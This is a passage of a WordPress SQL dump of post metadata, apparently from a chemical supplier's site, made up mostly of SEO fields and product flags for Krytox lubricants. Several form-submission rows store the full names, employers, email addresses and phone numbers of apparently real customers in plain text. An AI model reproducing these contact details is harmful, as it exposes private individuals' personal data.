INSERT INTO `wp_postmeta` VALUES (20185, 952, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20186, 956, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20187, 960, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20188, 955, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20189, 967, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20190, 968, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20191, 970, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20192, 977, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20193, 973, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20194, 984, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20195, 986, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20196, 989, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20197, 992, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20198, 993, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20199, 995, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20200, 996, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20201, 997, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20202, 998, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20203, 999, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20204, 1001, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20205, 994, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20206, 1002, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20207, 1009, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20208, 1010, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20209, 1011, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20210, 1012, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20211, 1014, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20212, 1015, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20213, 1016, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20214, 1019, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20215, 1031, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20216, 1033, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20217, 1035, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20218, 1042, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20219, 1059, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20220, 1061, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20221, 1063, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20222, 1065, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20223, 1067, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20224, 1069, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20225, 1072, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20226, 1077, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20227, 1088, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20228, 1097, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20229, 1100, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20230, 1102, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20231, 1104, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20232, 1106, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20233, 1111, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20234, 1149, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20235, 1152, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20236, 1164, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20237, 1166, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20238, 1168, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20239, 1178, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20240, 1181, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20241, 1183, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20242, 1185, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20243, 1187, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20244, 1189, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20245, 1191, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20246, 1193, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20247, 1198, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20248, 1209, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20249, 1212, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20250, 1216, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20251, 1221, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20252, 1224, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20253, 1227, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20254, 1230, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20255, 1263, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20256, 1268, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20257, 1270, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20258, 1276, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20259, 1278, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20260, 1287, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20261, 1292, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20262, 1338, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20263, 1344, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20264, 1384, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20265, 1428, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20266, 1431, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20267, 1435, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20268, 1637, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20269, 1638, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20270, 1643, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20271, 1644, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20272, 1645, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20273, 1646, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20274, 1647, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20275, 1648, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20276, 1649, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20277, 1662, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20278, 1664, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20279, 1666, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20280, 1668, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20281, 1670, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20282, 1673, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20283, 1677, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20284, 1679, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20285, 1681, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20286, 1683, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20287, 1690, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20288, 1693, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20289, 1695, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20290, 1697, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20291, 1705, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20292, 1706, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20293, 1707, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20294, 1708, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20295, 1710, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20296, 1711, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20297, 1712, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20298, 1713, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20299, 1719, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20300, 1722, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20301, 1724, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20302, 1726, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20303, 1729, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20304, 1801, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20305, 1819, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20306, 1836, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20307, 1840, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20308, 1834, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20309, 1851, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20310, 1852, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20311, 1866, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20312, 1868, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20313, 1865, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20323, 814, '_wp_old_slug', 'gpl-207'); 
INSERT INTO `wp_postmeta` VALUES (20324, 814, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (20325, 402, '_wp_old_slug', 'gpl-210'); 
INSERT INTO `wp_postmeta` VALUES (20326, 402, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (20327, 818, '_wp_old_slug', 'gpl-211'); 
INSERT INTO `wp_postmeta` VALUES (20328, 120, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20329, 819, '_wp_old_slug', 'gpl-212'); 
INSERT INTO `wp_postmeta` VALUES (20331, 821, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (20332, 2031, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (20333, 2031, '_seq_num', '3'); 
INSERT INTO `wp_postmeta` VALUES (20334, 2031, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20335, 2031, '_field_1', 'Andrew Besore'); 
INSERT INTO `wp_postmeta` VALUES (20336, 2031, '_field_10', 'Intel'); 
INSERT INTO `wp_postmeta` VALUES (20337, 2031, '_field_2', 'andrew.l.besore@intel.com'); 
INSERT INTO `wp_postmeta` VALUES (20338, 2031, '_field_8', '(503) 696-5568'); 
INSERT INTO `wp_postmeta` VALUES (20339, 2031, '_field_3', 'I would like  a software copy, PDF of the MSDS for MS-381 lubricant. \r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (20340, 2031, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (20341, 2031, '_sub_id', '2031'); 
INSERT INTO `wp_postmeta` VALUES (20343, 2037, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (20344, 2037, '_seq_num', '4'); 
INSERT INTO `wp_postmeta` VALUES (20345, 2037, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20346, 2037, '_field_1', 'LUCY CASTRO'); 
INSERT INTO `wp_postmeta` VALUES (20347, 2037, '_field_10', 'MIAMI AEROSPACE'); 
INSERT INTO `wp_postmeta` VALUES (20348, 2037, '_field_2', 'miaaerosp@aol.com'); 
INSERT INTO `wp_postmeta` VALUES (20349, 2037, '_field_8', '(305) 882-0802'); 
INSERT INTO `wp_postmeta` VALUES (20350, 2037, '_field_3', 'please quote 2 gallons of epon 8132'); 
INSERT INTO `wp_postmeta` VALUES (20351, 2037, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (20352, 2037, '_sub_id', '2037'); 
INSERT INTO `wp_postmeta` VALUES (20353, 822, '_wp_old_slug', 'gpl-215'); 
INSERT INTO `wp_postmeta` VALUES (20354, 823, '_wp_old_slug', 'gpl-216'); 
INSERT INTO `wp_postmeta` VALUES (20355, 823, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (20356, 64, '_yoast_wpseo_focuskw_text_input', 'Miller-Stephenson Chemical'); 
INSERT INTO `wp_postmeta` VALUES (20357, 64, '_yoast_wpseo_focuskw', 'Miller-Stephenson Chemical'); 
INSERT INTO `wp_postmeta` VALUES (20358, 64, '_yoast_wpseo_metadesc', 'Miller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions.'); 
INSERT INTO `wp_postmeta` VALUES (20359, 989, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20360, 989, '_yoast_wpseo_focuskw_text_input', 'Krytox TS4 Thread Sealant'); 
INSERT INTO `wp_postmeta` VALUES (20361, 989, '_yoast_wpseo_focuskw', 'Krytox TS4 Thread Sealant'); 
INSERT INTO `wp_postmeta` VALUES (20362, 989, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20363, 989, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20364, 989, '_wp_old_slug', 'ts4'); 
INSERT INTO `wp_postmeta` VALUES (20365, 989, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (20366, 824, '_wp_old_slug', 'gpl-217'); 
INSERT INTO `wp_postmeta` VALUES (20367, 824, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (20368, 410, '_wp_old_slug', 'gpl-220'); 
INSERT INTO `wp_postmeta` VALUES (20369, 410, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20370, 410, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 220'); 
INSERT INTO `wp_postmeta` VALUES (20371, 410, '_yoast_wpseo_focuskw', 'Krytox GPL 220'); 
INSERT INTO `wp_postmeta` VALUES (20372, 410, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20373, 410, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20374, 843, '_wp_old_slug', 'gpl-221'); 
INSERT INTO `wp_postmeta` VALUES (20375, 843, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20376, 843, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 221'); 
INSERT INTO `wp_postmeta` VALUES (20377, 843, '_yoast_wpseo_focuskw', 'Krytox GPL 221'); 
INSERT INTO `wp_postmeta` VALUES (20378, 843, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20379, 843, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20380, 846, '_wp_old_slug', 'gpl-222-2'); 
INSERT INTO `wp_postmeta` VALUES (20381, 846, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20382, 846, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 222'); 
INSERT INTO `wp_postmeta` VALUES (20383, 846, '_yoast_wpseo_focuskw', 'Krytox GPL 222'); 
INSERT INTO `wp_postmeta` VALUES (20384, 846, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20385, 846, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20386, 844, '_wp_old_slug', 'gpl-222'); 
INSERT INTO `wp_postmeta` VALUES (20387, 844, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20388, 844, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 223'); 
INSERT INTO `wp_postmeta` VALUES (20389, 844, '_yoast_wpseo_focuskw', 'Krytox GPL 223'); 
INSERT INTO `wp_postmeta` VALUES (20390, 844, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20391, 844, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20392, 847, '_wp_old_slug', 'gpl-224'); 
INSERT INTO `wp_postmeta` VALUES (20393, 847, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20394, 847, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 224'); 
INSERT INTO `wp_postmeta` VALUES (20395, 847, '_yoast_wpseo_focuskw', 'Krytox GPL 224'); 
INSERT INTO `wp_postmeta` VALUES (20396, 847, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20397, 847, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20398, 847, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (20399, 848, '_wp_old_slug', 'gpl-225'); 
INSERT INTO `wp_postmeta` VALUES (20400, 848, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20401, 848, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 225'); 
INSERT INTO `wp_postmeta` VALUES (20402, 848, '_yoast_wpseo_focuskw', 'Krytox GPL 225'); 
INSERT INTO `wp_postmeta` VALUES (20403, 848, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20404, 848, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20405, 850, '_wp_old_slug', 'gpl-226'); 
INSERT INTO `wp_postmeta` VALUES (20406, 850, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20407, 850, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 226'); 
INSERT INTO `wp_postmeta` VALUES (20408, 850, '_yoast_wpseo_focuskw', 'Krytox GPL 226'); 
INSERT INTO `wp_postmeta` VALUES (20409, 850, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20410, 850, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20411, 852, '_wp_old_slug', 'gpl-227'); 
INSERT INTO `wp_postmeta` VALUES (20412, 852, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20413, 852, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 227'); 
INSERT INTO `wp_postmeta` VALUES (20414, 852, '_yoast_wpseo_focuskw', 'Krytox GPL 227'); 
INSERT INTO `wp_postmeta` VALUES (20415, 852, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20416, 852, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20417, 642, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (20418, 645, '_wp_old_slug', '240ad'); 
INSERT INTO `wp_postmeta` VALUES (20419, 455, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (20420, 455, '_yoast_wpseo_focuskw_text_input', 'ReleaSys Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (20421, 455, '_yoast_wpseo_focuskw', 'ReleaSys Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (20422, 455, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (20423, 455, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20424, 455, '_yoast_wpseo_linkdex', '62'); 
INSERT INTO `wp_postmeta` VALUES (20435, 647, '_yoast_wpseo_linkdex', '72'); 
INSERT INTO `wp_postmeta` VALUES (20436, 648, '_yoast_wpseo_linkdex', '72'); 
INSERT INTO `wp_postmeta` VALUES (20437, 646, '_yoast_wpseo_linkdex', '76'); 
INSERT INTO `wp_postmeta` VALUES (20438, 649, '_wp_old_slug', '280ab'); 
INSERT INTO `wp_postmeta` VALUES (20439, 649, '_yoast_wpseo_linkdex', '49'); 
INSERT INTO `wp_postmeta` VALUES (20440, 653, '_yoast_wpseo_linkdex', '49'); 
INSERT INTO `wp_postmeta` VALUES (20441, 655, '_wp_old_slug', '283ac'); 
INSERT INTO `wp_postmeta` VALUES (20442, 655, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20443, 655, '_yoast_wpseo_focuskw_text_input', 'Krytox 283AC'); 
INSERT INTO `wp_postmeta` VALUES (20444, 655, '_yoast_wpseo_focuskw', 'Krytox 283AC'); 
INSERT INTO `wp_postmeta` VALUES (20445, 655, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20446, 655, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20447, 656, '_wp_old_slug', '283ad'); 
INSERT INTO `wp_postmeta` VALUES (20448, 656, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20449, 656, '_yoast_wpseo_focuskw_text_input', 'Krytox 283AD'); 
INSERT INTO `wp_postmeta` VALUES (20450, 656, '_yoast_wpseo_focuskw', 'Krytox 283AD'); 
INSERT INTO `wp_postmeta` VALUES (20451, 656, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20452, 656, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20453, 652, '_wp_old_slug', '283az'); 
INSERT INTO `wp_postmeta` VALUES (20454, 652, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20455, 652, '_yoast_wpseo_focuskw_text_input', 'Krytox 283AZ'); 
INSERT INTO `wp_postmeta` VALUES (20456, 652, '_yoast_wpseo_focuskw', 'Krytox 283AZ'); 
INSERT INTO `wp_postmeta` VALUES (20457, 652, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20458, 652, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20459, 652, '_yoast_wpseo_linkdex', '49'); 
INSERT INTO `wp_postmeta` VALUES (20460, 2046, '_edit_lock', '1482247049:2'); 
INSERT INTO `wp_postmeta` VALUES (20461, 2046, '_edit_last', '1'); 
INSERT INTO `wp_postmeta` VALUES (20462, 2046, '_footer', 'normal'); 
INSERT INTO `wp_postmeta` VALUES (20463, 2046, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (20464, 2046, 'U_S_C_message', '<H3 align=center>You must create an account first.<BR><BR> Please click the button to register: <a href="https://www.miller-stephenson.com/my-account/" class="button primary">REGISTER</a></h3>'); 
INSERT INTO `wp_postmeta` VALUES (20465, 2046, '_yoast_wpseo_content_score', '90'); 
INSERT INTO `wp_postmeta` VALUES (20466, 2046, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20467, 2049, 'U_S_C_roles', 'a:1:{i:0;s:8:"Customer";}'); 
INSERT INTO `wp_postmeta` VALUES (20468, 2049, 'U_S_C_message', 'You must Create a USER account, in order to request SDS access.'); 
INSERT INTO `wp_postmeta` VALUES (20469, 2049, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (20470, 2049, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (20471, 2049, '_menu_item_object_id', '2046'); 
INSERT INTO `wp_postmeta` VALUES (20472, 2049, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (20473, 2049, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (20474, 2049, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (20475, 2049, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (20476, 2049, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (20477, 2046, 'U_S_C_roles', 'a:1:{i:0;s:8:"Customer";}'); 
INSERT INTO `wp_postmeta` VALUES (20478, 967, '_wp_old_slug', 'eg-2000'); 
INSERT INTO `wp_postmeta` VALUES (20479, 967, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20480, 967, '_yoast_wpseo_focuskw_text_input', 'Krytox EG 2000'); 
INSERT INTO `wp_postmeta` VALUES (20481, 967, '_yoast_wpseo_focuskw', 'Krytox EG 2000'); 
INSERT INTO `wp_postmeta` VALUES (20482, 967, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20483, 967, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20484, 968, '_wp_old_slug', 'eg-3000'); 
INSERT INTO `wp_postmeta` VALUES (20485, 968, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20486, 968, '_yoast_wpseo_focuskw_text_input', 'Krytox EG 3000'); 
INSERT INTO `wp_postmeta` VALUES (20487, 968, '_yoast_wpseo_focuskw', 'Krytox EG 3000'); 
INSERT INTO `wp_postmeta` VALUES (20488, 968, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20489, 968, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20490, 2050, '_edit_lock', '1498053214:2'); 
INSERT INTO `wp_postmeta` VALUES (20491, 2050, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (20492, 2051, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (20493, 2051, '_seq_num', '1'); 
INSERT INTO `wp_postmeta` VALUES (20494, 2051, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20495, 2051, '_field_12', 'sdfsdf'); 
INSERT INTO `wp_postmeta` VALUES (20496, 2051, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (20497, 2051, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (20498, 2051, '_field_14', 'jjjj@jjjjj.com'); 
INSERT INTO `wp_postmeta` VALUES (20499, 2051, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (20500, 2051, '_field_16', 'sdfsdfsdf'); 
INSERT INTO `wp_postmeta` VALUES (20501, 2051, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (20502, 2051, '_sub_id', '2051'); 
INSERT INTO `wp_postmeta` VALUES (20503, 2050, '_oembed_429d13454a48a1045eebd97013a492f6', '<blockquote data-secret="Pe4nwoiOVR" class="wp-embedded-content"><a href="https://www.miller-stephenson.com/tech-support/sds/">SDS</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" src="https://www.miller-stephenson.com/tech-support/sds/embed/#?secret=Pe4nwoiOVR" data-secret="Pe4nwoiOVR" width="600" height="338" title="&#8220;SDS&#8221; &#8212; Miller-Stephenson Chemicals" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (20504, 2050, '_oembed_time_429d13454a48a1045eebd97013a492f6', '1475068031'); 
INSERT INTO `wp_postmeta` VALUES (20505, 2050, '_oembed_8fc54c8e1e97558e0e0c9cd818019d0d', '{{unknown}}'); 
